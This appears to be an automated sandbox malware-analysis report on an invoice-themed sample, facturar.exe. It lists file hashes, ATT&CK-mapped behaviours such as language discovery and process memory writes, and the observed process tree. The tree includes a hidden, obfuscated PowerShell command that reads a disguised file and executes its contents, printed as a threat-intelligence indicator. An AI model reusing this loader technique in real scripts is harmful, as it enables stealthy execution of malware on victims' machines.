Analysis
-
max time kernel
94s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
17/02/2025, 11:49
Static task
static1
Behavioral task
behavioral1
Sample
facturar.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
facturar.exe
Resource
win10v2004-20250211-en
Behavioral task
behavioral3
Sample
dydsmnstres.ps1
Resource
win7-20250207-en
Behavioral task
behavioral4
Sample
dydsmnstres.ps1
Resource
win10v2004-20250211-en
General
-
Target
facturar.exe
-
Size
781KB
-
MD5
dc6405171400ba31490159b7e59eae0b
-
SHA1
59ac7ab360bda219ab6aa5b8b57fd5d3a1f7ec73
-
SHA256
8e533c355130e312b4bdecd237c49d50cf8d12c5f88fbe991ecaac462f84c9a6
-
SHA512
15944b966bad130dece39b2b958073b5c63806f8f8441e193af481c2349bd896d2f599bc9dc82ca4a5233802d225245ea5e1b459a6c9033485189be7a7a7ba08
-
SSDEEP
12288:2tlyuHaQfKrVOnQlp6UV/ytzlI/Xr+urZTbq9pK0R6iyNc3pipkyfGSN:AbQknM6UJylurZTG9pK+65c5yfFN
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2368 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language facturar.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2368 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2368 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1496 wrote to memory of 2368 1496 facturar.exe 30 PID 1496 wrote to memory of 2368 1496 facturar.exe 30 PID 1496 wrote to memory of 2368 1496 facturar.exe 30 PID 1496 wrote to memory of 2368 1496 facturar.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\facturar.exe"C:\Users\Admin\AppData\Local\Temp\facturar.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Juletrslyset=Get-Content -Raw 'C:\Users\Admin\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\dydsmnstres.Akk';$sjalsmnsterets=$Juletrslyset.SubString(5587,3);.$sjalsmnsterets($Juletrslyset) "2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6KB
MD59361066f2eab82730a5f698f735ecf25
SHA17279f63469efc0aaf9fcf70d8accd623f7d5ac6b
SHA2564976ee2c2c27f507b578f55c6323533dee7b47e25877f8f51398ad34545497d0
SHA512f706fb6dbd5596631ae35a2f6b8fd0d723bd46e6f646383245c470f57c2b3cee2a82f4695e24d9e0a2f7382156eaad4ae218443069c962b247015ec8429583ee